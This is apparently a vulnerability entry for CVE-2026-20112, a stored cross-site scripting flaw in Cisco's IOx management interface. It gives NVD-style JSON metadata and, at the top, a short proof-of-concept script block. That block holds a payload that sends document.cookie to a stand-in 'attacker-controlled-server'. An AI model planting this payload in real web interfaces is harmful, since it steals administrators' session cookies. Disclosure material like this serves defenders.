CVE-2026-20112

<!-- // PoC Concept for Stored XSS in Cisco IOx Management Interface // Attacker injects payload via a vulnerable input field (e.g., App Description) --> <script> // Example payload to demonstrate execution alert('CVE-2026-20112 Stored XSS Executed'); // Data exfiltration example (e.g., stealing session cookies) var img = new Image(); img.src = "http://attacker-controlled-server/steal?c=" + document.cookie; </script>

{"cve": {"id": "CVE-2026-20112", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:15.140", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based Cisco IOx application hosting environment management interface of Cisco IOS XE Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.\r\n\r This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials."}, {"lang": "es", "value": "Una vulnerabilidad en la interfaz de gestión del entorno de alojamiento de aplicaciones Cisco IOx basada en web del software Cisco IOS XE podría permitir a un atacante remoto autenticado realizar un ataque de cross-site scripting (XSS) almacenado contra un usuario de la interfaz de gestión basada en web de un dispositivo afectado. Esta vulnerabilidad se debe a una validación insuficiente de la entrada proporcionada por el usuario. Un atacante podría explotar esta vulnerabilidad inyectando código malicioso en páginas específicas de la interfaz. Un exploit exitoso podría permitir al atacante ejecutar código de script arbitrario en el contexto de la interfaz afectada o acceder a información sensible basada en el navegador. Para explotar esta vulnerabilidad, el atacante debe tener credenciales administrativas válidas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-xss-LpGkzwtJ", "source": "[email protected]"}]}}